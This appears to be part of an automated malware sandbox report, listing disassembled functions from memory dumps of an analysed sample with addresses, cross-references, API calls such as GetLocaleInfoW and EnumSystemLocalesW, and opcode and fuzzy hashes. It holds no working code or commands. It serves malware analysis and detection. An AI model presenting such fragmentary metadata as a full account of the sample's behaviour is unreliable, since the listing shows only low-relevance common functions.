Opcode ID: 2ffd9d3d6f170c2214dbe814d0ce227cd3553b19ed2464a9f138930d33f2ff89
Instruction ID: 1dbe365ee206bba2439d511e64bab4fb78a092c274e4e556d7e78bc1c6ef9ef7
Opcode Fuzzy Hash: 2ffd9d3d6f170c2214dbe814d0ce227cd3553b19ed2464a9f138930d33f2ff89
Instruction Fuzzy Hash: 3B6149715083519BD358CF25C48981BFBE2FBD8758F104A1DF596A62A0D3B5CA09CF83

Uniqueness

Uniqueness Score: -1.00%

Function 014025C3, Relevance: 2.6, Strings: 2, Instructions: 150COMMON

Download Yara Rule

Strings

}O, xrefs: 0140262F
"a, xrefs: 014026FA

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: "a$}O
API String ID: 0-3171921561
Opcode ID: 5f0f5eb4b05d16de1cebac53edaf4031b4ce2a800789579872347960d480ff58
Instruction ID: fd4d1ab09a1f3d4c4cdd80f518cba5d7f022be31da3ca0090b042f2695d49405
Opcode Fuzzy Hash: 5f0f5eb4b05d16de1cebac53edaf4031b4ce2a800789579872347960d480ff58
Instruction Fuzzy Hash: 606143710083019FC359DF29C98981BBBF1FBD8758F405A1DF69A962A0D7B5CA498F83

Uniqueness

Uniqueness Score: -1.00%

Function 013F748A, Relevance: 2.6, Strings: 2, Instructions: 139COMMON

Download Yara Rule

Strings

5Q, xrefs: 013F764B
9c, xrefs: 013F749C

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: 5Q$9c
API String ID: 0-959052616
Opcode ID: e7ad58cc8d5df846655cdeabbf6a908c1b4ab0a520b6b50cf2aa65b9bceccefe
Instruction ID: b605e64ace312beee6e330cb245812433d47f495633a885d7ea3713a0e5954b0
Opcode Fuzzy Hash: e7ad58cc8d5df846655cdeabbf6a908c1b4ab0a520b6b50cf2aa65b9bceccefe
Instruction Fuzzy Hash: D15177B15083419FD359CF29D48A80BBBE1FBD8358F404E0DF58AA6260D3B5DA59CF86

Uniqueness

Uniqueness Score: -1.00%

Function 013EBFB6, Relevance: 2.6, Strings: 2, Instructions: 122COMMON

Download Yara Rule

Strings

&xH, xrefs: 013EC10B
&xH, xrefs: 013EC111

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: &xH$&xH
API String ID: 0-1205046639
Opcode ID: 75776525c0191bd20906f6c7ed4d75df482bf2a07ae04cd259bb522680d291d8
Instruction ID: cc95f88513043c694cb4d479b123cc90602cb36e1c83fd4163b20910fcafbb38
Opcode Fuzzy Hash: 75776525c0191bd20906f6c7ed4d75df482bf2a07ae04cd259bb522680d291d8
Instruction Fuzzy Hash: F05115B1E00209EBDF08CFA9D94A9EEBBB2EB44704F208059E514BB250D7B55A55CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 013FB1B5, Relevance: 2.6, Strings: 2, Instructions: 122COMMON

Download Yara Rule

Strings

{_, xrefs: 013FB235
r{P, xrefs: 013FB23C

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: r{P${_
API String ID: 0-359611368
Opcode ID: b13479e0b2f08c1888c47a976b9863cdf1bf456e1398041e40de404634815ad5
Instruction ID: 23b2dbbb02f33cd83e88eefbd2771001876f305c2ef51fe69597a728f7325696
Opcode Fuzzy Hash: b13479e0b2f08c1888c47a976b9863cdf1bf456e1398041e40de404634815ad5
Instruction Fuzzy Hash: 425123B1C0121E9BDF09CFA9C94A5EEFBB5FF54318F20819AC511B6250D7B50A49CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 013E3345, Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

W, xrefs: 013E33CA
#3&, xrefs: 013E336D

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: #3&$W
API String ID: 0-2325648925
Opcode ID: 903bd24c524ec61389012d17f97ffb538c973f0d91108d0bf608dcb63df8d608
Instruction ID: b25edbcd14f3576b5c9c623c6fd30cb19a704015887d04b8f21ccabda8cdc85b
Opcode Fuzzy Hash: 903bd24c524ec61389012d17f97ffb538c973f0d91108d0bf608dcb63df8d608
Instruction Fuzzy Hash: D5511175D0131AEBDF19DFA5C94A5EEBBB1FF08718F208059D016B62A0D3B46A54CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 013FCCD4, Relevance: 2.6, Strings: 2, Instructions: 101COMMON

Download Yara Rule

Strings

5/|, xrefs: 013FCD23
}f-, xrefs: 013FCD2C

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: 5/|$}f-
API String ID: 0-2834218136
Opcode ID: 0940f7b8d7e58c5ad3842be0d7febd7ee8dd47da857396efdfefb5fb9a79c218
Instruction ID: 92ca834c412d38d7dbfb908f2fab744d2cd492c20a42986ff3fea85a95041b41
Opcode Fuzzy Hash: 0940f7b8d7e58c5ad3842be0d7febd7ee8dd47da857396efdfefb5fb9a79c218
Instruction Fuzzy Hash: 1F31F37290010DBFDF05DFA5DC898EEBFB6FB48348F108159FA1466260D3B69A609B50

Uniqueness

Uniqueness Score: -1.00%

Function 013E5923, Relevance: 2.6, Strings: 2, Instructions: 87COMMON

Download Yara Rule

Strings

ms, xrefs: 013E59B5
`d, xrefs: 013E597D

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: `d$ms
API String ID: 0-1149396387
Opcode ID: deb45385cfc31a5128dbcd28618a47304140cc1eb3309295972ad1aee3cd9161
Instruction ID: 3eaaf7b1a6a5c0927c5b0da60c6ed94bfb8733d2800b24ce2fe2c6a57b12b36d
Opcode Fuzzy Hash: deb45385cfc31a5128dbcd28618a47304140cc1eb3309295972ad1aee3cd9161
Instruction Fuzzy Hash: F93189326093519FD305CF18C98545BFBE0EF98618F050B6DF989A7251C774EA08CB96

Uniqueness

Uniqueness Score: -1.00%

Function 013E220A, Relevance: 2.6, Strings: 2, Instructions: 83COMMON

Download Yara Rule

Strings

3c, xrefs: 013E22C5
TV1, xrefs: 013E2280

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: TV1$3c
API String ID: 0-3390316800
Opcode ID: 37f292062facc737efc07354ba87213b831a0bcd9870a8fb590c766737d432f5
Instruction ID: 91051f20056c0dc1365f2f0cee7669915ade58e4c8ef335e9ba9a894b2d0afa2
Opcode Fuzzy Hash: 37f292062facc737efc07354ba87213b831a0bcd9870a8fb590c766737d432f5
Instruction Fuzzy Hash: 7A310276D0020DFBDF05CF95C8498DEBBB6FB59354F408198F915A6250D3B69A20EF90

Uniqueness

Uniqueness Score: -1.00%

Function 013E2043, Relevance: 2.6, Strings: 2, Instructions: 58COMMON

Download Yara Rule

Strings

J4n, xrefs: 013E20F1
'q4, xrefs: 013E20AB

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: 'q4$J4n
API String ID: 0-1087674265
Opcode ID: dd6d369b6af7bfcc8bd6536940347bc93706b84673d42be7764cf8c905203803
Instruction ID: c2aeae06b9fcb94ed917b8f78b8385c4c098ec598b0ced4dd1af23a4ecb8c9be
Opcode Fuzzy Hash: dd6d369b6af7bfcc8bd6536940347bc93706b84673d42be7764cf8c905203803
Instruction Fuzzy Hash: CD21C4B5C0121EABDF45DFA1CA0A4EEBFB1FB14308F208099D51576260D7B50B18DF96

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DC6FE, Relevance: 1.8, APIs: 1, Instructions: 269COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008), ref: 6E4DC92B

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 7381c2ba2e52d879a5d52d13a0422757ae83d782a664fe2083e628b7dd7236bf
Instruction ID: 70456bdef0e60c73d1d252a119acc2bed4b7445787ccaf7847943f6da48f5be7
Opcode Fuzzy Hash: 7381c2ba2e52d879a5d52d13a0422757ae83d782a664fe2083e628b7dd7236bf
Instruction Fuzzy Hash: 4AB1893261060A8FD745CF68C4A6F547BE0FF05365F25869AE8A9CF3A1C335E996CB40

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C5916, Relevance: 1.6, APIs: 1, Instructions: 129COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 6E4C592F

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 53d8c996660a74fdf3acec45bfd6acf93138c87189528b6746b01ca8543c34a9
Instruction ID: 8a0611e0ae3b063517b3ef13241ddc4d85358e29c25384741e41975ba63f1e51
Opcode Fuzzy Hash: 53d8c996660a74fdf3acec45bfd6acf93138c87189528b6746b01ca8543c34a9
Instruction Fuzzy Hash: 5E4158B19016068FEB44CFA6D581B9EBBF4FB89718F21896BD411EB240D3799940CF62

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E5DE7, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 6E4DA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E4CED16,6E4FD0A0,0000000C,00000004,00000001,00000004,?,6E4B4865,00000000,00000000), ref: 6E4DA298
Part of subcall function 6E4DA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E4B4865,00000000,00000000), ref: 6E4DA33C
Part of subcall function 6E4DA294: _abort.LIBCMT ref: 6E4DA342

Part of subcall function 6E4DA294: _free.LIBCMT ref: 6E4DA2EF

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E4E5E3B

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: 8eed71967a49f40d24263312f3ccbd7f8aa1feee1b8e97e408c111738d807fb0
Instruction ID: 0a5e3353367ad4f6a95257439d33d4e0a41a458a7af02fc1820f4050f55b974a
Opcode Fuzzy Hash: 8eed71967a49f40d24263312f3ccbd7f8aa1feee1b8e97e408c111738d807fb0
Instruction Fuzzy Hash: 5A21DE72914206ABEB14DFB9DC41FAA73ACEF05315F1001ABED05DA640EB79AD45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E5A6F, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 6E4DA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E4CED16,6E4FD0A0,0000000C,00000004,00000001,00000004,?,6E4B4865,00000000,00000000), ref: 6E4DA298
Part of subcall function 6E4DA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E4B4865,00000000,00000000), ref: 6E4DA33C
Part of subcall function 6E4DA294: _abort.LIBCMT ref: 6E4DA342

EnumSystemLocalesW.KERNEL32(6E4E5B97,00000001,00000000,?,6E4DB71F,?,6E4E61C4,00000000,?,?,?), ref: 6E4E5AE1

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort
String ID:
API String ID: 2626063627-0
Opcode ID: ee74d400d3bed3a50ea3124b4cb475bf5f499d70a8b4a5d514345f2bb1211611
Instruction ID: 6abadaa39496cd2f0a1e500a74747d7e2372e05b74e1727af9acf3bc4bdfdad9
Opcode Fuzzy Hash: ee74d400d3bed3a50ea3124b4cb475bf5f499d70a8b4a5d514345f2bb1211611
Instruction Fuzzy Hash: AF1129362047015FDB189F79C8D0ABAB7A1FF80319B14482ED58687F40E775B502CB40

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E6017, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 6E4DA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E4CED16,6E4FD0A0,0000000C,00000004,00000001,00000004,?,6E4B4865,00000000,00000000), ref: 6E4DA298
Part of subcall function 6E4DA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E4B4865,00000000,00000000), ref: 6E4DA33C
Part of subcall function 6E4DA294: _abort.LIBCMT ref: 6E4DA342

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,6E4E5E92,00000000,00000000,?), ref: 6E4E6043

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$InfoLocale_abort
String ID:
API String ID: 2070445861-0
Opcode ID: 574e1f19a007ff890e990bbfc0f714149a6bac3d06f8861c0d1fd6ce13cf30f0
Instruction ID: b8c623d003357c220c09165cf7d5dfb665e2a7433cb06241b5e6ee1d70bd4d6b
Opcode Fuzzy Hash: 574e1f19a007ff890e990bbfc0f714149a6bac3d06f8861c0d1fd6ce13cf30f0
Instruction Fuzzy Hash: 2EF04932920126EFDB24DAF58809FBA7768EF00755F0048AADD15A3A40EA74FD41C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E597B, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 6E4DA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E4CED16,6E4FD0A0,0000000C,00000004,00000001,00000004,?,6E4B4865,00000000,00000000), ref: 6E4DA298
Part of subcall function 6E4DA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E4B4865,00000000,00000000), ref: 6E4DA33C
Part of subcall function 6E4DA294: _abort.LIBCMT ref: 6E4DA342

Part of subcall function 6E4DA294: _free.LIBCMT ref: 6E4DA2EF

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,6E4DB726,00000000,6E4DB846), ref: 6E4E59CF

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: d4d693da12e234ad6012bf4a3480f8f07dfb3d9006a2b656584cd5ed2de5c541
Instruction ID: f114d2cb7ec5a9192f54fc2446ad1fba9b1d2e78aa8788126aa53801482c934a
Opcode Fuzzy Hash: d4d693da12e234ad6012bf4a3480f8f07dfb3d9006a2b656584cd5ed2de5c541
Instruction Fuzzy Hash: C9F0D132A51205ABCB14AAB8E844DFA73ACDB46725F1001BEA90697340EA386D058790

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E5B0A, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 6E4DA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E4CED16,6E4FD0A0,0000000C,00000004,00000001,00000004,?,6E4B4865,00000000,00000000), ref: 6E4DA298
Part of subcall function 6E4DA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E4B4865,00000000,00000000), ref: 6E4DA33C
Part of subcall function 6E4DA294: _abort.LIBCMT ref: 6E4DA342

EnumSystemLocalesW.KERNEL32(6E4E5DE7,00000001,FFFFFFFF,?,6E4DB71F,?,6E4E6188,6E4DB71F,?,?,?,?,?,6E4DB71F,?,?), ref: 6E4E5B56

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort
String ID:
API String ID: 2626063627-0
Opcode ID: 600c6c58c05041735d0f89f057231727a51a7b589fa1260cbb5550327f6a502a
Instruction ID: 76c7b68df6526dcfe6363ed5c29cd2bc5226cc90e4916fd66e4318b7afde697e
Opcode Fuzzy Hash: 600c6c58c05041735d0f89f057231727a51a7b589fa1260cbb5550327f6a502a
Instruction Fuzzy Hash: CEF046363003055FD7149FB9DC80EAA7BA4FF8072DF04882EEA018BB40E7B5A802C640

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DDD93, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 6E4D7625: EnterCriticalSection.KERNEL32(-6E500F0D,?,6E4DE708,?,6E4FD460,0000000C), ref: 6E4D7634

EnumSystemLocalesW.KERNEL32(6E4DDD86,00000001,6E4FD420,0000000C), ref: 6E4DDDCB

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 07e79a32557f4f7694ab0b6c2a48169331fb41df2bcdc324610d2088ad2cf4ae
Instruction ID: d1b0094c7c401f4ff168945f209010622f690327d8cb59c4be8336ed2ebf070f
Opcode Fuzzy Hash: 07e79a32557f4f7694ab0b6c2a48169331fb41df2bcdc324610d2088ad2cf4ae
Instruction Fuzzy Hash: F6F08732A106049FDB10EFB8D805FAD3BE4BB45728F00851AF404CB290DB348948CF82

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E5A24, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 6E4DA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E4CED16,6E4FD0A0,0000000C,00000004,00000001,00000004,?,6E4B4865,00000000,00000000), ref: 6E4DA298
Part of subcall function 6E4DA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E4B4865,00000000,00000000), ref: 6E4DA33C
Part of subcall function 6E4DA294: _abort.LIBCMT ref: 6E4DA342

EnumSystemLocalesW.KERNEL32(6E4E597B,00000001,FFFFFFFF,?,?,6E4E61E6,6E4DB71F,?,?,?,?,?,6E4DB71F,?,?,?), ref: 6E4E5A5B

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort
String ID:
API String ID: 2626063627-0
Opcode ID: 4dc357f40b78aa1001c1821fdad11d2b448ce6c49be19384db96c8f5331dda2f
Instruction ID: f0b80434c5a119aec9e4fd74d56a7bf3b299f32e8916154b3cb6f960d2daa677
Opcode Fuzzy Hash: 4dc357f40b78aa1001c1821fdad11d2b448ce6c49be19384db96c8f5331dda2f
Instruction Fuzzy Hash: B0F0AB3630020957CB04DFB6D884FAA7FA4EFC2725F0A405EEA068BB40D23AD943C790

Uniqueness

Uniqueness Score: -1.00%

Function 013E6B25, Relevance: 1.5, Strings: 1, Instructions: 245COMMON

Download Yara Rule

Strings

%, xrefs: 013E6CA5

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: %
API String ID: 0-3264965323
Opcode ID: 3142b5b75d566d528c832396996194f5f63fc4764e0d4cb955955d30fa633101
Instruction ID: 2493ece9611107c3460698719afd7a245fafacba70bac5ff4190d6c7f01354d7
Opcode Fuzzy Hash: 3142b5b75d566d528c832396996194f5f63fc4764e0d4cb955955d30fa633101
Instruction Fuzzy Hash: 96B167B11083518FC768CA29C49A56BBBF4FBE4608F804D2DF696862A0D7729949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 013F9DA1, Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

Ci,, xrefs: 013F9DCA

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: Ci,
API String ID: 0-192566918
Opcode ID: 5f915c74aebb82ae42e9263993067c442fc4f0db6a7726f02f37a687e14f641f
Instruction ID: a812512dec4e4112975befe55e2e84464ce2c92b2ddcd133282505aa9522b918
Opcode Fuzzy Hash: 5f915c74aebb82ae42e9263993067c442fc4f0db6a7726f02f37a687e14f641f
Instruction Fuzzy Hash: 33B131711083869FD768CF25D58991BBBF6FBC5748F00891DF68A96260D7B28909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 6E4CDA2D, Relevance: 1.5, Strings: 1, Instructions: 215COMMON

Download Yara Rule

Strings

0, xrefs: 6E4CDB9D

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 41a65894c1243ec84d441c124d89baabc1dcae01a738f4c9180a4174ac12db86
Instruction ID: eaf5c5d5b41b477693d278d78b34e6d7260ed4b9db203a1848284cb59069e150
Opcode Fuzzy Hash: 41a65894c1243ec84d441c124d89baabc1dcae01a738f4c9180a4174ac12db86
Instruction Fuzzy Hash: 7B51676D2C86465BDB9089F488A1FFF33A99B02F04F00191BD651CBB81E746D642CF97

Uniqueness

Uniqueness Score: -1.00%

Function 013E2A46, Relevance: 1.5, Strings: 1, Instructions: 213COMMON

Download Yara Rule

Strings

8r=, xrefs: 013E2C29

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: 8r=
API String ID: 0-2421701215
Opcode ID: cd77ce6526c4ff906a317ec3fc006d12490b7f57bfc3c7fb3e429dfbed7c9be8
Instruction ID: 67ac4b8f1845cc2d94ecda9be5a5dad6ec81921aa2f323f4daff5250ed4a4304
Opcode Fuzzy Hash: cd77ce6526c4ff906a317ec3fc006d12490b7f57bfc3c7fb3e429dfbed7c9be8
Instruction Fuzzy Hash: CEA132711083819FC358CF65D48984BFBF5FBC4358F405A1EF1959A260D7B5CA498F82

Uniqueness

Uniqueness Score: -1.00%

Function 013E1C76, Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

p#[, xrefs: 013E1E12

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: p#[
API String ID: 0-3919597151
Opcode ID: 95bd53a8cd285bb78030567b64ba3a81a7881134e7ff1adfe1c1a355e542d212
Instruction ID: 265910b31863566dee8e7a07ede7f9f3ebfe88dc4d706f2070534bb5904f271f
Opcode Fuzzy Hash: 95bd53a8cd285bb78030567b64ba3a81a7881134e7ff1adfe1c1a355e542d212
Instruction Fuzzy Hash: 7A5165711093419FC798CE25C94981BFBE5FBC4758F408A1DF58AA6260D7B1DA09CF87

Uniqueness

Uniqueness Score: -1.00%

Function 013F406E, Relevance: 1.4, Strings: 1, Instructions: 136COMMON

Download Yara Rule

Strings

[B, xrefs: 013F4292

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: [B
API String ID: 0-3436147626
Opcode ID: a3ae6741022e1685c9b67d45ebb240180f37c3f176d35d3c19d9f155d4cd3eb7
Instruction ID: 780e8bb7bd82d218937d048e28c568d3753434c3c8e31a62dcd7785b01150668
Opcode Fuzzy Hash: a3ae6741022e1685c9b67d45ebb240180f37c3f176d35d3c19d9f155d4cd3eb7
Instruction Fuzzy Hash: F3515772408342AFC754CF25C94591BBBE5FBD8758F408A2CF28AA6160E3B5CA09CF47

Uniqueness

Uniqueness Score: -1.00%

Function 013F78A5, Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

ID, xrefs: 013F78EF

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: ID
API String ID: 0-299066170
Opcode ID: 5b88523c4a8a29f1f8463c3ad97ac3549addcaf8d0952cc7dd13773f02622f43
Instruction ID: cd634221f061b10c545134ba39cde39134eb3d926e1b8b8e254af01b2a030861
Opcode Fuzzy Hash: 5b88523c4a8a29f1f8463c3ad97ac3549addcaf8d0952cc7dd13773f02622f43
Instruction Fuzzy Hash: A841F03110C3428BDB18CE68E54846FBBE1EBD475CF10492EF6D6667A0D3748A49CB97

Uniqueness

Uniqueness Score: -1.00%

Function 01400687, Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

Jd}, xrefs: 0140069B

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: Jd}
API String ID: 0-2909368870
Opcode ID: 375f760bc60cdf05572d8ee9cb941027e2c69033bf71ca4e0f4402854d73eeed
Instruction ID: c3ca9faf368a489537f82b7b86bd84f24676c83df86f63aa681520a86add070c
Opcode Fuzzy Hash: 375f760bc60cdf05572d8ee9cb941027e2c69033bf71ca4e0f4402854d73eeed
Instruction Fuzzy Hash: 87419C712083428FD719DF2AC84562BBBE1FBC4388F54492DF596972A1D378DA09CF86

Uniqueness

Uniqueness Score: -1.00%

Function 013E3F5C, Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

[ , xrefs: 013E3FC0

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: [
API String ID: 0-603502248
Opcode ID: 27cbefbce515dd8bc70399823a0d799d1188f19287186614176daeb31b516365
Instruction ID: 39098ea51ca842a46fc2d7748616075da64b76d442d05efd5d4e40c51c54e76b
Opcode Fuzzy Hash: 27cbefbce515dd8bc70399823a0d799d1188f19287186614176daeb31b516365
Instruction Fuzzy Hash: 31418AB26093119FC354CF69C88855BFBE0FF88718F414A2EE989D7250D774D908CB96

Uniqueness

Uniqueness Score: -1.00%

